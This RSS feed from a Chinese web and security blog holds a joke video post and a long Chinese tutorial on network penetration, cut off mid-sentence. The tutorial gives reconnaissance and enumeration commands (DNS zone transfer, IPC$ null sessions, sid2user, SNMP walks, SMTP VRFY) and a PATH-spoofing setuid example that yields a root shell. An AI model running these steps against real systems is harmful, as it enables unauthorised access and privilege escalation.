<?xml version="1.0" encoding="utf-8"?><?xml-stylesheet href='http://feed.feedsky.com/styles/temp01.xsl' type='text/xsl' ?><!--这是一个由Feedsy提供技术支持的Feed，为了提高读者阅读的体验，以及满足用户美化自己Feed的需要，我们设计了多种精美的Feed模板，提供给大家选择，所有最终呈现出来的样式，皆由用户自愿选择使用，未经许可，任何团体和个人，请不要擅自修改样式或者盗用，这是对于用户选择权的尊重。--><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:fs="http://www.feedsky.com/namespace/feed" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:dc="http://purl.org/dc/elements/1.1/" version="2.0"><channel><atom:link href="http://feed.uedbox.com" type="application/rss+xml" rel="self"></atom:link><fs:self_link href="http://feed.feedsky.com/uedbox" type="application/rss+xml"></fs:self_link><lastBuildDate>Wed, 22 Feb 2012 11:13:18 GMT</lastBuildDate><title>体验盒子</title><description>前端开发、用户体验、网络安全、资源分享</description><link>http://www.uedbox.com</link><sy:updatePeriod>hourly</sy:updatePeriod><sy:updateFrequency>1</sy:updateFrequency><language>en</language><pubDate>Wed, 22 Feb 2012 11:16:12 GMT</pubDate><item><title>我有一条金闪闪的游泳裤</title><link>http://www.uedbox.com/2012_02_22/4084/i-have-a-wearing-swimming-trunks.jsp</link><content:encoded>&lt;div align=&quot;center&quot;&gt;&lt;object id=&quot;movie_player&quot; width=&quot;480&quot; height=&quot;400&quot; classid=&quot;clsid:d27cdb6e-ae6d-11cf-96b8-444553540000&quot; codebase=&quot;http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0&quot;&gt;&lt;param name=&quot;src&quot; value=&quot;http://player.youku.com/player.php/sid/XMzU0ODUxMTcy/v.swf&quot; /&gt;&lt;param name=&quot;quality&quot; value=&quot;high&quot; /&gt;&lt;param name=&quot;allowfullscreen&quot; value=&quot;true&quot; /&gt;&lt;param name=&quot;flashvars&quot; value=&quot;isShowRelatedVideo=false&amp;amp;showAd=0&amp;amp;show_pre=1&amp;amp;show_next=1&amp;amp;isAutoPlay=false&amp;amp;isDebug=false&amp;amp;UserID=&amp;amp;winType=interior&amp;amp;playMovie=true&amp;amp;MM Control=false&amp;amp;MMout=false&amp;amp;RecordCode=1001,1002,1003,1004,1005,1006,2001,3001,3002,3003,3004,3005,3007,3008,9999&quot; /&gt;&lt;param name=&quot;pluginspage&quot; value=&quot;http://www.macromedia.com/go/getflashplayer&quot; /&gt;&lt;embed id=&quot;movie_player&quot; width=&quot;480&quot; height=&quot;400&quot; type=&quot;application/x-shockwave-flash&quot; src=&quot;http://player.youku.com/player.php/sid/XMzU0ODUxMTcy/v.swf&quot; quality=&quot;high&quot; allowfullscreen=&quot;true&quot; flashvars=&quot;isShowRelatedVideo=false&amp;amp;showAd=0&amp;amp;show_pre=1&amp;amp;show_next=1&amp;amp;isAutoPlay=false&amp;amp;isDebug=false&amp;amp;UserID=&amp;amp;winType=interior&amp;amp;playMovie=true&amp;amp;MM Control=false&amp;amp;MMout=false&amp;amp;RecordCode=1001,1002,1003,1004,1005,1006,2001,3001,3002,3003,3004,3005,3007,3008,9999&quot; pluginspage=&quot;http://www.macromedia.com/go/getflashplayer&quot; /&gt;&lt;/object&gt;&lt;/div&gt;
&lt;p&gt;萌系滴~欢乐了！&lt;/p&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/608669180/uedbox/feedsky/s.gif?r=http://www.uedbox.com/2012_02_22/4084/i-have-a-wearing-swimming-trunks.jsp&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</content:encoded><wfw:commentRss>http://www.uedbox.com/2012_02_22/4084/i-have-a-wearing-swimming-trunks.jsp/feed</wfw:commentRss><slash:comments>0</slash:comments><description>萌系滴~欢乐了！&lt;img src=&quot;http://www1.feedsky.com/t1/608669180/uedbox/feedsky/s.gif?r=http://www.uedbox.com/2012_02_22/4084/i-have-a-wearing-swimming-trunks.jsp&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</description><category>来看来玩</category><category>搞笑</category><pubDate>Wed, 22 Feb 2012 19:13:18 +0800</pubDate><author>Adoing</author><comments>http://www.uedbox.com/2012_02_22/4084/i-have-a-wearing-swimming-trunks.jsp#comments</comments><guid isPermaLink="false">http://www.uedbox.com/?p=4084</guid><dc:creator>Adoing</dc:creator><fs:srclink>http://www.uedbox.com/2012_02_22/4084/i-have-a-wearing-swimming-trunks.jsp</fs:srclink><fs:srcfeed>http://www.uedbox.com/feed</fs:srcfeed><fs:itemid>feedsky/uedbox/~8266863/608669180/6370047</fs:itemid></item><item><title>网络渗透思路 Network penetration ideas</title><link>http://www.uedbox.com/2012_02_21/4081/network-penetration-ideas.jsp</link><content:encoded>&lt;p&gt;下面的文章对于网络渗透,提供了一些很好的思路.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;一，踩点&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;踩点可以了解目标主机和网络的一些基本的安全信息，主要有；&lt;/p&gt;
&lt;p&gt;1，管理员联系信息，电话号，传真号；&lt;/p&gt;
&lt;p&gt;2，IP地址范围；&lt;/p&gt;
&lt;p&gt;3，DNS服务器；&lt;/p&gt;
&lt;p&gt;4，邮件服务器。&lt;/p&gt;
&lt;p&gt;相关搜索方法：&lt;/p&gt;
&lt;p&gt;1，搜索网页。&lt;/p&gt;
&lt;p&gt;确定目标信息1，为以后发动字典和木马入侵做准备；寻找网页源代码找注释和&lt;br /&gt;
隐藏域，寻找隐藏域中的”FORM”标记。例如：&lt;/p&gt;
&lt;p&gt;&lt;span id=&quot;more-4081&quot;&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;可以发起SQL注入攻击，为以后入侵数据库做准备。&lt;/p&gt;
&lt;p&gt;相关工具：UNIX下的Wget,Windows下的Teleport。&lt;/p&gt;
&lt;p&gt;2，链接搜索&lt;/p&gt;
&lt;p&gt;目标网站所在的服务器可能有其他具有弱点的网站，可以进行迂回入侵，而且可&lt;br /&gt;
以发现某些隐含的信息。&lt;/p&gt;
&lt;p&gt;搜索方法介绍：&lt;/p&gt;
&lt;p&gt;通过各种搜索引擎：GOOGLE，http://www.dogpile.comhttp://www.hotbot.com&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;二，查点&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;A，确定目标的域名和相关的网络信息。&lt;/p&gt;
&lt;p&gt;搜索方法；&lt;/p&gt;
&lt;p&gt;Whois查询，通过Whois数据库查询可以得到以下的信息：&lt;/p&gt;
&lt;p&gt;1，注册机构：显示相关的注册信息和相关的Whois服务器；&lt;/p&gt;
&lt;p&gt;2，机构本身：显示与某个特定机构相关的所有信息；&lt;/p&gt;
&lt;p&gt;3，域名：显示与某个特定域名相关的所有信息&lt;/p&gt;
&lt;p&gt;4，网络：显示与某个特定网络或单个IP地址相关的所有信息；&lt;/p&gt;
&lt;p&gt;5，联系点:显示与某位特定人员相关的所有信息&lt;/p&gt;
&lt;p&gt;搜索引擎站：http://www.infobear.com/whois.shtml&lt;/p&gt;
&lt;p&gt;举例：Output of: whois 163.com@whois.internic.net&lt;/p&gt;
&lt;p&gt;Registrant:&lt;/p&gt;
&lt;p&gt;Netease.com, Inc.&lt;/p&gt;
&lt;p&gt;36/F Peace World Plaza, No.362-366&lt;/p&gt;
&lt;p&gt;Huan Shi Dong Road&lt;/p&gt;
&lt;p&gt;Guangzhou, Guangdong 510060&lt;/p&gt;
&lt;p&gt;CN&lt;/p&gt;
&lt;p&gt;Domain Name: 163.COM&lt;/p&gt;
&lt;p&gt;Administrative Contact, Technical Contact:&lt;/p&gt;
&lt;p&gt;Netease.com, Inc. nsadmin@corp.netease.com&lt;/p&gt;
&lt;p&gt;36/F Peace World Plaza, No.362-366&lt;/p&gt;
&lt;p&gt;Huan Shi Dong Road&lt;/p&gt;
&lt;p&gt;Guangzhou, Guangdong 510060&lt;/p&gt;
&lt;p&gt;CN&lt;/p&gt;
&lt;p&gt;+86-20-85525516 fax: +86-20-85525535&lt;/p&gt;
&lt;p&gt;Record expires on 24-Jan-2009.&lt;/p&gt;
&lt;p&gt;Record created on 15-Sep-1997.&lt;/p&gt;
&lt;p&gt;Database last updated on 10-Feb-2006 03:24:01 EST.&lt;/p&gt;
&lt;p&gt;Domain servers in listed order:&lt;/p&gt;
&lt;p&gt;NS.NEASE.NET 202.106.185.75&lt;/p&gt;
&lt;p&gt;NS3.NEASE.NET 220.181.28.3&lt;/p&gt;
&lt;p&gt;B，利用ARIN数据库可以查询某个域名所对应的网络地址分配信息。&lt;/p&gt;
&lt;p&gt;相关搜索地址：http://ws.arin.net/cgi-bin/whois.pl&lt;/p&gt;
&lt;p&gt;利用http://whois.apnic.net/apnic-bin/whois2.pl进行对IP地址的查询，以搜集&lt;/p&gt;
&lt;p&gt;有关的网络信息：&lt;/p&gt;
&lt;p&gt;举例：163.com-&amp;gt;202.108.9.16&lt;/p&gt;
&lt;p&gt;inetnum: 202.108.0.0 – 202.108.255.255&lt;/p&gt;
&lt;p&gt;netname: CNCGROUP-BJ&lt;/p&gt;
&lt;p&gt;descr: CNCGROUP Beijing province network&lt;/p&gt;
&lt;p&gt;descr: China Network Communications Group Corporation&lt;/p&gt;
&lt;p&gt;descr: No.156,Fu-Xing-Men-Nei Street,&lt;/p&gt;
&lt;p&gt;descr: Beijing 100031&lt;/p&gt;
&lt;p&gt;country: CN&lt;/p&gt;
&lt;p&gt;admin-c: CH455-AP&lt;/p&gt;
&lt;p&gt;tech-c: SY21-AP&lt;/p&gt;
&lt;p&gt;mnt-by: APNIC-HM&lt;/p&gt;
&lt;p&gt;mnt-lower: MAINT-CNCGROUP-BJ&lt;/p&gt;
&lt;p&gt;mnt-routes: MAINT-CNCGROUP-RR&lt;/p&gt;
&lt;p&gt;changed: hm-changed@apnic.net 20031017&lt;/p&gt;
&lt;p&gt;status: ALLOCATED PORTABLE&lt;/p&gt;
&lt;p&gt;changed: hm-changed@apnic.net 20060124&lt;/p&gt;
&lt;p&gt;source: APNIC&lt;/p&gt;
&lt;p&gt;role: CNCGroup Hostmaster&lt;/p&gt;
&lt;p&gt;e-mail: abuse@cnc-noc.net&lt;/p&gt;
&lt;p&gt;address: No.156,Fu-Xing-Men-Nei Street,&lt;/p&gt;
&lt;p&gt;address: Beijing,100031,P.R.China&lt;/p&gt;
&lt;p&gt;nic-hdl: CH455-AP&lt;/p&gt;
&lt;p&gt;phone: +86-10-82993155&lt;/p&gt;
&lt;p&gt;fax-n +86-10-82993102&lt;/p&gt;
&lt;p&gt;country: CN&lt;/p&gt;
&lt;p&gt;admin-c: CH444-AP&lt;/p&gt;
&lt;p&gt;tech-c: CH444-AP&lt;/p&gt;
&lt;p&gt;changed: abuse@cnc-noc.net 20041119&lt;/p&gt;
&lt;p&gt;mnt-by: MAINT-CNCGROUP&lt;/p&gt;
&lt;p&gt;source: APNIC&lt;/p&gt;
&lt;p&gt;person: sun ying&lt;/p&gt;
&lt;p&gt;address: Beijing Telecommunication Administration&lt;/p&gt;
&lt;p&gt;address: TaiPingHu DongLi 18, Xicheng District&lt;/p&gt;
&lt;p&gt;address: Beijing 100031&lt;/p&gt;
&lt;p&gt;country: CN&lt;/p&gt;
&lt;p&gt;phone: +86-10-66198941&lt;/p&gt;
&lt;p&gt;fax-n +86-10-68511003&lt;/p&gt;
&lt;p&gt;e-mail: suny@publicf.bta.net.cn&lt;/p&gt;
&lt;p&gt;nic-hdl: SY21-AP&lt;/p&gt;
&lt;p&gt;mnt-by: MAINT-CHINANET-BJ&lt;/p&gt;
&lt;p&gt;changed: suny@publicf.bta.net.cn 19980824&lt;/p&gt;
&lt;p&gt;source: APNIC&lt;/p&gt;
&lt;p&gt;知道了目标所在的网络，可以进行迂回渗透，寻找薄弱点，进入目标网络，然后在&lt;br /&gt;
攻击目标。&lt;/p&gt;
&lt;p&gt;C，DNS信息查询&lt;/p&gt;
&lt;p&gt;域名系统允许把一个DNS命名空间分割成多个区，各个去分别保存一个或多个DNS域&lt;br /&gt;
的名字信息。&lt;/p&gt;
&lt;p&gt;区复制和区传送：DNS服务器之间是采用区传送的机制来同步和复制区内数据的。&lt;/p&gt;
&lt;p&gt;区传送的安全问题不在于所传输的域名信息，而在于其配置是否正确。因为有些域&lt;br /&gt;
名信息当中包含了不应该公开的内部主机和服务器的域名信息。&lt;/p&gt;
&lt;p&gt;相关工具：&lt;/p&gt;
&lt;p&gt;1，Windows下，nslookup,SamSpade;&lt;/p&gt;
&lt;p&gt;2, UNIX下：nslookup,dig,host,axfr&lt;/p&gt;
&lt;p&gt;在Windows下的使用方法：&lt;/p&gt;
&lt;p&gt;c:/&amp;gt;nslookup&lt;/p&gt;
&lt;p&gt;Default server: 目标的DNS服务器&lt;/p&gt;
&lt;p&gt;Address: 目标的IP地址&lt;/p&gt;
&lt;p&gt;&amp;gt;set type=ANY //表示接受任何可能的DNS记录&lt;/p&gt;
&lt;p&gt;&amp;gt;ls -d 163.com &amp;gt;zone.163.com.txt //获得目标域的相关记录，结果保存在zon&lt;br /&gt;
e.163.com.txt&lt;/p&gt;
&lt;p&gt;D，通过Traceroute获得网络的拓扑结构以及网络网络设备的地址。&lt;/p&gt;
&lt;p&gt;相关工具；&lt;/p&gt;
&lt;p&gt;Windows下：Tracert 支持ICMP协议&lt;/p&gt;
&lt;p&gt;UNIX下：Traceroute 支持ICMP和DNS协议，由于多数防火墙已经过滤了ICMP，所以&lt;br /&gt;
UNIX下的Traceroute是不错的选择，而且使用-p n选项可以自己指定使用的端口。&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;三，网络扫描&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;面对不同的网络，应该采用不用的扫描方法：&lt;/p&gt;
&lt;p&gt;1，对于内部网络，可用类型很多，ICMP协议是普遍要装上的，在内部网广播ICMP数&lt;br /&gt;
据包可以区分WINDOWS和UNIX系统，&lt;/p&gt;
&lt;p&gt;发送类型为8的ICMP的ECHO请求，如果可以受到类型为0的ECHO回应，表明对方主机&lt;br /&gt;
是存活的。&lt;/p&gt;
&lt;p&gt;相关工具介绍：&lt;/p&gt;
&lt;p&gt;UNIX下的：fping&amp;amp;gping&lt;/p&gt;
&lt;p&gt;WINDOWS下：Pinger 特点：速度快，多线程。&lt;/p&gt;
&lt;p&gt;2，对于外部网络，可用类型也很多，涉及到的原理也有很多，例如：TCP扫描，UD&lt;br /&gt;
P扫描，&lt;/p&gt;
&lt;p&gt;其实我是很不愿意用扫描工具的，很容易使对方感觉到入侵事件的发生，不论是防&lt;br /&gt;
火墙还是入侵检测系统都会或多或少的留下我们的脚印，如果遇到一个勤快的管理&lt;br /&gt;
员的话，那么这次入侵很可能以失败告终。&lt;/p&gt;
&lt;p&gt;但使用与否依各个喜好而定了：），有时候我们在测试网络或者主机的安全性时，&lt;br /&gt;
就不能忽视他的存在了，首先，安全测试不是入侵，全面的测试对抵御黑客和蠕虫&lt;br /&gt;
的攻击是必要的，在这里推荐的端口扫描工具是NMAP，因为他带有躲避IDS检测的机&lt;br /&gt;
制，重组了TCP的三次握手机制，慢扫描机制等等都是其他扫描工具无法比拟的，U&lt;br /&gt;
DP扫描是很不可靠的，原因有下几点：&lt;/p&gt;
&lt;p&gt;这种扫描依靠ICMP端口不可达消息,如果发送端给目标一个感兴趣的端口发送了一个&lt;br /&gt;
UDP数据包后，没有收到ICMP端口不可打消息，那么我们认为该端口处于打开状态。&lt;/p&gt;
&lt;p&gt;不可靠的原因：&lt;/p&gt;
&lt;p&gt;1，路由器可能丢弃UDP分组；&lt;/p&gt;
&lt;p&gt;2，很多的UDP服务不也不产生响应；&lt;/p&gt;
&lt;p&gt;3，防火墙的常规配置是丢弃UDP分组（除DNS外）；&lt;/p&gt;
&lt;p&gt;4，休眠状态的UDP端口是不会发送一个ICMP端口不可到达消息。&lt;/p&gt;
&lt;p&gt;还有的扫描工具就是弱点扫描工具，这些工具综合各种漏洞信息构造漏洞数据库，&lt;br /&gt;
去探究存在漏洞没有打补丁的主机,当然也有针对特定漏洞的检测发现工具（脚本小&lt;br /&gt;
子能用，网络安全人员也弄用–双刃剑-：）&lt;/p&gt;
&lt;p&gt;这里详细介绍对目标操作系统类型的检测原理：&lt;/p&gt;
&lt;p&gt;Telnet标识和TCP/IP堆栈指纹：&lt;/p&gt;
&lt;p&gt;1，网上许多的系统可以直接Telnet到目标，大多会返回欢迎信息的，返回的信息包&lt;br /&gt;
含了该端口所对应的服务软件的版本号，这个对于寻找这个版本的软件的漏洞很重&lt;br /&gt;
要，如果对方开了Telnet，那么可以直接得到对方的系统类型和版本号，这个对于&lt;br /&gt;
挖掘系统的漏洞很重要（对于溢出来说，不同版本的系统和语言版本的系统来说，&lt;br /&gt;
RET地址，JMP ESP，地址是不同的）。&lt;/p&gt;
&lt;p&gt;2，如今越来越多的管理员懂的了关闭功能标志，甚至提供伪造的欢迎信息。那么T&lt;br /&gt;
CP/IP堆栈指纹是区分不同系统的好方法。&lt;/p&gt;
&lt;p&gt;1，FIN扫描&lt;/p&gt;
&lt;p&gt;给打开的端口发送FIN包，RFC 793规定不返回任何响应，例外的系统是： MS Wind&lt;br /&gt;
ows,BSDI,CISCO,HP/UX,MVS和IRIX都返回一个RESET包。&lt;/p&gt;
&lt;p&gt;2，TCP初始序列号（ISN）采样&lt;/p&gt;
&lt;p&gt;这种方法利用了在实现TCP连接时使用不同的ISN模式识别系统，可以分成多种模式&lt;br /&gt;
：传统的64K增加（旧&lt;/p&gt;
&lt;p&gt;UNIX OS），随机增加（新版的Solaris,IRIX,FreeBSD,Digital UNIX和Cray等），&lt;br /&gt;
真正随机（Linux 2.0.*,OpenVMS和新版AIX等），Windows系统使用所谓的”时间依&lt;br /&gt;
赖性”模型，即ISN的增加同某一个短固定的时间间隔有关系，有些主机始终使用固&lt;br /&gt;
定的ISN，例如3COM集线器（使用0×803)和AppleLaserWriter打印机（0xC7001）。&lt;/p&gt;
&lt;p&gt;3，不分片位&lt;/p&gt;
&lt;p&gt;目前许多系统在他们发送的包中使用IP”不分片”位，这主要是想获得好的运行性&lt;br /&gt;
能，不过也不是所有的操作系统都有此功能，即使有，其实现的方式可能也不同。&lt;br /&gt;
因此利用次位或许有利于我们收集更多的有关目标OS的信息。&lt;/p&gt;
&lt;p&gt;4，TCP初始窗&lt;/p&gt;
&lt;p&gt;TCP初始窗只是简单地测试返回包的窗口尺寸。Queso和Nmap可以对实际的窗口进行&lt;br /&gt;
窗口跟踪。在很多操作系统中是一个常数。例如：AIX是唯一使用0x3F25的操作系统&lt;br /&gt;
。对于完全重新编写代码的NT 5的TCP堆栈，使用0x402E.&lt;/p&gt;
&lt;p&gt;5,ACK值&lt;/p&gt;
&lt;p&gt;如果发送一个FIN|PSH|URG，许多操作系统设置ACK等于初始序列号，而Windows和某&lt;br /&gt;
些打印机将发送seq+1.如果发送一个SYN|FIN|PSH|URG到打开的端口，不同的Windo&lt;br /&gt;
ws系统的实现将很不一致，有时返回seq,有时返回seq+1,甚至返回完全随机的数值&lt;br /&gt;
。&lt;/p&gt;
&lt;p&gt;6，ICMP错误消息机制&lt;/p&gt;
&lt;p&gt;某些操作系统按照RFC 1812的建议，限制不同错误消息的发送速率。例如：Linux内&lt;br /&gt;
核（在net/ipv4/icmp.h中定义）限制目标不可到达消息的产生速率为4秒种内80个&lt;br /&gt;
，如果超过这个限制将有1/4的惩罚。测试方法是发送一大串包到某些随机选取的高&lt;br /&gt;
端口，然后计算返回的不可到达包的数目。&lt;/p&gt;
&lt;p&gt;7，ICMP消息引用（Message Quoting)&lt;/p&gt;
&lt;p&gt;RFC规定：ICMP错误消息将引用一小部分导致错误消息包的ICMP消息内容。对于端口&lt;br /&gt;
不可达消息，几乎所有的实现都只发送所需要的IP头+8字节。不过Solaris发送的内&lt;br /&gt;
容更多，而Linux发送的东西最多。这就是我们识别没有打开任何端口的Linux和So&lt;br /&gt;
laris主机。&lt;/p&gt;
&lt;p&gt;8，ICMP错误消息回射完整性&lt;/p&gt;
&lt;p&gt;主机对端口不可打错误消息将送回一小部分于是消息的内容。某些机器送回的包中&lt;br /&gt;
包括的协议头部分已经被改变。例如，AIX和BSDI送回的IP总长度是20字节。而系统&lt;br /&gt;
BSDI，FreeBSD,OpenBSD,ULTRIX和VAXen则将原样送回你所发送的IP标识符。某些系&lt;br /&gt;
统（AIX和FreeBSD等）将送回不一致或等于0的校验和。这同样适用于UDP校验和。&lt;br /&gt;
Nmap对ICMP错误消息包进行九种不同的测试以标识系统之间的微笑差别。&lt;/p&gt;
&lt;p&gt;9，TCP选项&lt;/p&gt;
&lt;p&gt;是实现TCP/IP协议时可选的一个部分功能，这跟不同的系统实现有关，这些选项都&lt;br /&gt;
是挖掘可用信息的好方法。原因是：&lt;/p&gt;
&lt;p&gt;1，他们都是可选项，不是所有主机都可以实现的；&lt;/p&gt;
&lt;p&gt;2，如果你所发送的包中对某个选项进行了设置，只要目标支持，那么目标主机就返&lt;br /&gt;
回此选项；&lt;/p&gt;
&lt;p&gt;3，可以在包中设置所有的选项进行测试。&lt;/p&gt;
&lt;p&gt;例如：Nmap在每个探测包中设置所有的选项来进行测试：&lt;/p&gt;
&lt;p&gt;Windows Scale=10;NOP;Max Segment Size=265;Timestamp;End of Ops;&lt;/p&gt;
&lt;p&gt;从返回的的包中查看这些选项，就知道了什么系统支持他们。&lt;/p&gt;
&lt;p&gt;还有一种被动操作系统识别方法，就是监控不同系统之间网络包的情况来判断目标&lt;br /&gt;
的操作系统类型，siphon被用来进行这方面的测试，这个工作原理如下：&lt;/p&gt;
&lt;p&gt;签名：&lt;/p&gt;
&lt;p&gt;主要TCP的四个字段判断：&lt;/p&gt;
&lt;p&gt;1，TTL：出站的包的存活时间；&lt;/p&gt;
&lt;p&gt;2，Window size：窗口大小；&lt;/p&gt;
&lt;p&gt;3，DF：是否设置了不准分片位；&lt;/p&gt;
&lt;p&gt;4，TOS：是否设置了服务类型。&lt;/p&gt;
&lt;p&gt;综合这些信息可以大概判断出目标的系统，但不能%100。&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;四，查点&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;利用查点技术可以得到比前面讲的更多更具体的有用信息，例如：帐户信息等。&lt;/p&gt;
&lt;p&gt;1，Windows系统查点技术&lt;/p&gt;
&lt;p&gt;利用NetBIOS规则，首先介绍NetBIOS,NetBOIS位于TCP/IP之上，定义了多个TCP和U&lt;br /&gt;
DP端口。&lt;/p&gt;
&lt;p&gt;—-TCP&lt;/p&gt;
&lt;p&gt;（1），139：nbsession:NetBOIS会话。&lt;/p&gt;
&lt;p&gt;例如：net use //IP/ipc$ ” ” /user:” “.&lt;/p&gt;
&lt;p&gt;（2），42：WINS：Windows Internet名字系统（UDP端口也是42）。&lt;/p&gt;
&lt;p&gt;—-UDP&lt;/p&gt;
&lt;p&gt;（1）137：nbname:名字查询。&lt;/p&gt;
&lt;p&gt;例如：nbtstat -A IP //03中显示的不是计算机名就是用户名&lt;/p&gt;
&lt;p&gt;（2）138：nbdatagram:UDP数据报服务&lt;/p&gt;
&lt;p&gt;例如：net send /d:domain-name “Hello”&lt;/p&gt;
&lt;p&gt;得到用户名利用到了IPC$空会话和sid工具。sid工具由两个小工具组成：user2sid&lt;br /&gt;
和sid2user.user2sid获得用户名或组名的sid;sid2user则是输入一个sid而获得相&lt;br /&gt;
应用户名的和组名，sid就是在创建用户时而创建的，相当于UNIX系统下的UID,WIN&lt;br /&gt;
系统权限的检查就是通过对SID的检查的。一个sid是由一长串数字组成的，其中包&lt;br /&gt;
括两个部分，前一部分用来唯一标识一个域，后一部分唯一标识一个用户名，这部&lt;br /&gt;
分数字被称作rid，既相对标识符，rid有一定的规律，其取值总是从500开始的，超&lt;br /&gt;
级管理员的rid总是500，而GUEST用户的rid总是501；而新建立的帐户的rid从1000&lt;br /&gt;
开始。&lt;/p&gt;
&lt;p&gt;具体的步骤：&lt;/p&gt;
&lt;p&gt;c:/net use //IP/ipc$ ” ” /user:” ”&lt;/p&gt;
&lt;p&gt;c:/user2sid //IP guest //得到了SID的前半部分&lt;/p&gt;
&lt;p&gt;s-1-5-21-1123561945-1580818891-1957994488-501&lt;/p&gt;
&lt;p&gt;s是sid的前缀，后面跟的是1表示版本号，5用于标识发放sid的授权实体，5指NT/2&lt;br /&gt;
000。21-1123561945-1580818891-1957994488唯一地标识域和工作组。不同的用户&lt;br /&gt;
只是最后的相对标识符不一样。现在用sid2user查询系统的用户名了：&lt;/p&gt;
&lt;p&gt;c:/sid2user //IP 5 21 1123561945 1580818891 1957994488 500&lt;/p&gt;
&lt;p&gt;name is cookie&lt;/p&gt;
&lt;p&gt;domain is condor&lt;/p&gt;
&lt;p&gt;c:/sid2user //IP 5 21 1123561945 1580818891 1957994488 1001&lt;/p&gt;
&lt;p&gt;SNMP查点：通过默认的管理群字符串PUBLIC读取特性，可以得到系统的一些信息，&lt;br /&gt;
具体有：接口表，路由表及ARP表，TCP表和UDP表，设备表和存储表，进程表和软件&lt;br /&gt;
表，用户表，共享表。&lt;/p&gt;
&lt;p&gt;SNMP工具，snmputil.exe&lt;/p&gt;
&lt;p&gt;例如：&lt;/p&gt;
&lt;p&gt;1，或者网络接口数目：&lt;/p&gt;
&lt;p&gt;c:/snmputil get localhost public .1.3.6.1.2.1.2.1.0&lt;/p&gt;
&lt;p&gt;2,显示所有的SNMP变量内容&lt;/p&gt;
&lt;p&gt;c:/snmputil walk localhost public .1.3&lt;/p&gt;
&lt;p&gt;2UNIX类系统的查点技术&lt;/p&gt;
&lt;p&gt;1，$showmount -e www.target.com //前提2049号端口开着（NFS）&lt;/p&gt;
&lt;p&gt;2，$finger @www.target.com //还有rusers&lt;/p&gt;
&lt;p&gt;3, $telnet www.target.com 25&lt;/p&gt;
&lt;p&gt;vrfy root //证实是否有root&lt;/p&gt;
&lt;p&gt;expn adm&lt;/p&gt;
&lt;p&gt;quit&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;五，具体的分析漏洞&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;针对特定目标进行了以上分析后，总结出最好的入侵思路，选择入侵工具，做好入&lt;br /&gt;
侵的准备工作是必须，有时入侵时间的选择也是很重要的，因为会涉及到正常的公&lt;br /&gt;
司网络的正常通信，甚至会使恶意的网络在你入侵测试就发生了，最直接的漏洞利&lt;br /&gt;
用方法，我认为是溢出漏洞了，因为他直接就可以得到对方的系统权限，返回一个&lt;br /&gt;
和在本地一样的SHELL环境，此时无所不能：&lt;/p&gt;
&lt;p&gt;溢出攻击的分类有：&lt;/p&gt;
&lt;p&gt;1，WINDOWS下的和UNIN下的&lt;/p&gt;
&lt;p&gt;一般原理，就用户提交的参数范围超过了在内存中保存的本地变量的范围，而程序&lt;br /&gt;
或者系统并没有对输入的参数进行合理的长度检查，导致了被调用函数的返回地址&lt;br /&gt;
被覆盖，如果用一个跳转到我们提交的shellcode的地方的地址代替，那么我们的s&lt;br /&gt;
hellcode就可以运行，成功得到了目标的系统权限。&lt;/p&gt;
&lt;p&gt;此外还有格式化串漏洞，导致这个漏洞的原因是在处理用户数据的参数时没有过滤&lt;br /&gt;
用户提交的，格式化符号，例如%n这个将允许输出的参数的个数保存在内存中，恶&lt;br /&gt;
意构造此漏洞用户将会向内存的任何位置写SHELLCODE的地址。&lt;/p&gt;
&lt;p&gt;2,常见漏洞类型&lt;/p&gt;
&lt;p&gt;UNIX下的本地漏洞很多，挖掘起来也较容易，他主要有以下几种类型：&lt;/p&gt;
&lt;p&gt;1，环境欺骗&lt;/p&gt;
&lt;p&gt;一般指PATH环境变量的欺骗，就是说如果一个特权的程序执行了一个外部的命令，&lt;br /&gt;
那么我们可以简单的构造这个外部命令程序，然后修改PATH使这个特权程序能够去&lt;br /&gt;
首先执行我们构造的外部命令程序，而这个外部的命令程序是一个去得SHELL的程序&lt;br /&gt;
例如：&lt;/p&gt;
&lt;p&gt;bash$cat &amp;gt;ps &amp;lt; &amp;gt;#!/bin/sh&lt;/p&gt;
&lt;p&gt;&amp;gt;EOF&lt;/p&gt;
&lt;p&gt;而这个特权程序是：&lt;/p&gt;
&lt;p&gt;bash$cat &amp;gt;test.c &amp;lt; &amp;gt;int main()&lt;/p&gt;
&lt;p&gt;&amp;gt;{&lt;/p&gt;
&lt;p&gt;&amp;gt;setuid(0);&lt;/p&gt;
&lt;p&gt;&amp;gt;system(“ps -ef”); /*程序调用了外部命令，但没有给出这个命令的绝对路径，&lt;br /&gt;
这个是PATH欺骗的前提*/&lt;/p&gt;
&lt;p&gt;&amp;gt;}&lt;/p&gt;
&lt;p&gt;&amp;gt;EOF&lt;/p&gt;
&lt;p&gt;编译后的test文件具有s为，属主是root.这样设置是因为程序test执行时会以root&lt;br /&gt;
身份运行特权命令，这样在他运行时由于调用的是我们伪造的ps命令程序，所以会&lt;br /&gt;
产生一个root权限的SHELL环境。&lt;/p&gt;
&lt;p&gt;2，竞争条件&lt;/p&gt;
&lt;p&gt;一般指时序竞争，例如：&lt;/p&gt;
&lt;p&gt;fp=fopen(“test.log”,”w+”);&lt;/p&gt;
&lt;p&gt;chown(“test.log”,getuid(),getgid());&lt;/p&gt;
&lt;p&gt;原理也很简单，就是如果当前的程序运行时权限是euid=root,uid=当前用户，由于&lt;br /&gt;
文件test.log在打开会执行将文件的属主改为当前用户，所以我们可以在执行完fo&lt;br /&gt;
